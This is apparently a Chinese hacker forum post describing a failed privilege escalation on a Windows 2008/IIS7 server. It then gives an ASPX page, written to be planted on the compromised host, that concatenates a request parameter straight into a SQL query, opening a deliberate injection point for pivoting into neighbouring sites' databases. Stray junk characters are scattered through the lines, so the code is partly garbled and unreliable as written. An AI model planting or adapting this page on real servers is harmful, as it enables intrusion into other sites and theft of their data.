利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
+ L  b3 d) T5 b- Y代码量不多，自己写个拉倒了。烦死了。

​
- j( b* @$ o+ o0 W. m<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
, n' \$ m0 F9 p) Z<html xmlns="http://www.w3.org/1999/xhtml">
9 x- @( l5 k2 z1 w. }6 y<head runat="server">
) B8 j9 |! ~, o' ?    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
& s! A+ l, v+ S    <form id="form1" runat="server">
    <div>
     <script language="c#" runat="server">
            
         void page_init(object sender, EventArgs e)
         {
8 T2 c/ F, c3 R- J! I5 x* @            
, s2 u* J& ]* D( J+ z2 h4 p0 Q% k             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
) }/ \! U; {: Z# `8 o  a8 S8 `' J            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
            
3 b! g: U. d# H             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
: \7 a: s3 z) q1 \            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
/ p5 q  U$ O+ D# l             int x = command.ExecuteNonQuery();
7 J* B* v1 {' v, ^3 |* x             Response.Write(i+"\n");
/ y( v4 s, V) E$ K3 z+ }             Response.Write(x);
' b( i, k; f1 E  V1 E3 n             conn.Close();
. ]# ?2 O/ p2 N" n, F/ ?8 S         }
     
( C# i4 m$ F# w9 Q3 T' y  </script>
+ a3 x2 F) V# N1 e; O    </div>
* X' A' {* P* F6 V8 P/ F    </form>
0 @1 P  t5 y7 Y) h6 w  J</body>
</html>